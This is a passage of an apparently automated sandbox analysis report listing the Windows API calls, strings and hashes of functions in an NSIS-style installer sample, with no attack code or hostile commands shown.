                                                • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427576,762323A0,00000000), ref: 00406902
                                                • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                • String ID: F$A
                                                • API String ID: 3347642858-1281894373
                                                • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                • CloseHandle.KERNEL32(?), ref: 00407212
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                • API String ID: 1916479912-1189179171
                                                • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427576,762323A0,00000000), ref: 00406902
                                                • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427576,762323A0,00000000), ref: 00406A73
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 3581403547-1792361021
                                                • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                Strings
                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                • API String ID: 542301482-1377821865
                                                • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                • lstrlenW.KERNEL32(?), ref: 004063F8
                                                • GetVersionExW.KERNEL32(?), ref: 00406456
                                                  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                • GlobalFree.KERNEL32(?), ref: 00406509
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                • API String ID: 20674999-2124804629
                                                • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                • GetSysColor.USER32(?), ref: 004041DB
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                • lstrlenW.KERNEL32(?), ref: 00404202
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                • SendMessageW.USER32(00000000), ref: 0040427D
                                                • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                • SetCursor.USER32(00000000), ref: 004042FE
                                                • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                • SetCursor.USER32(00000000), ref: 00404322
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                • String ID: F$N$open
                                                • API String ID: 3928313111-1104729357
                                                • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                • wsprintfA.USER32 ref: 00406B79
                                                • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                • CloseHandle.KERNEL32(?), ref: 00406C88
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                • API String ID: 565278875-3368763019
                                                • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                Download Yara Rule
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                • EndPaint.USER32(?,?), ref: 00401177
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
